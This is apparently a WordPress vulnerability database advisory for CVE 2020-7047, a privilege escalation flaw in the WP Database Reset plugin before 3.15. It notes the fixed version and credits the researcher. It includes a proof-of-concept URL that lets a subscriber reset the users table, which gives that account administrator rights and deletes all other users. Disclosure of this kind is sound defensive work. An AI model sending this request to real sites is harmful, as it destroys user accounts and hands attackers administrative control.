WP Database Reset < 3.15 - Privilege Escalation



Description
This flaw "allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request."
Proof of Concept
Login as a subscriber then send the following request:

URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111

Affects Plugin

fixed in version 3.15

References

CVE 2020-7047
URL https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infossecchloe
Views 4317
Verified No
WPVDB ID 10028

Timeline

Publicly Published 2020-01-16 (3 months ago)
Added 2020-01-16 (3 months ago)
Last Updated 2020-01-17 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin